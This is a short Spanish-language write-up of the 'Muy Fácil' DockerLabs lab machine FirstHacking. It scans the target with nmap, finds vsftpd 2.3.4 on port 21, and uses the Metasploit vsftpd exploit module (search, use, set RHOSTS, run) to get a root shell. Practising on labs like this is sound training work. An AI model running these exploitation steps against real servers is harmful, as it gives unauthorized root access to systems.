En el siguiente WriteUp, vamos a resolver la máquina de la plataforma de DockerLabs FirstHacking, clasificada con nivel de seguridad “Muy Fácil”.
Técnicas aplicadas para la resolución de la máquina:
- Escaneo de Puertos
- Metasploit
Descargamos la máquina docker desde la url de dokerlabs:
megadl https://mega.nz/file/oCd2VC5D#QfiRoFmZrZ-FjTuyRX9bLw7638fjluwp6jNth7JjXTw
Fase exploración:
Desplegamos la máquina vulnerable con el siguiente comando, desde la carpeta que hayamos descargado y descomprimido el .zip
sudo bash auto_deploy.sh firsthacking.tar
Comprobamos que tenemos conectividad con la máquina, realizando un ping a la ip objetivo.
Realizamos un análisis de los puertos abiertos, para analizar las posibles vulnerabilidades.
nmap -sV -A -Pn 172.17.0.2
Identificamos que está abierto únicamente el puerto 21, en el que corre el servicio de FTP. Este servicio está usado por el servicio VSFTP de la versión 2.3.4.
Fase explotación:
Para atacar está vulnerabilidad usaremos la herramienta para hacking ético Metasploit Framework. Para ejecutarlo usamos el comando msfconsole (-q si no queremos que se muestre el banner del programa en la terminal).
Ejecutamos en la consola msfconsole, para entrar en Metasploit y buscaremos un exploit (con el comando serach) para explotar la vulnerabilidad de vsftp:
Con los exploit que nos encuentra usaremos el exploit 1, que dice que es de un uso excelente, ejecutaremos los siguientes comandos:
search vsftp
use 1
show options
set RHOSTS $ipvictima
run
como podemos observar ya estamos dentro de la máquina objetivo con privilegios de “root”. Daríamos así por finalizada la intrusión al máquina.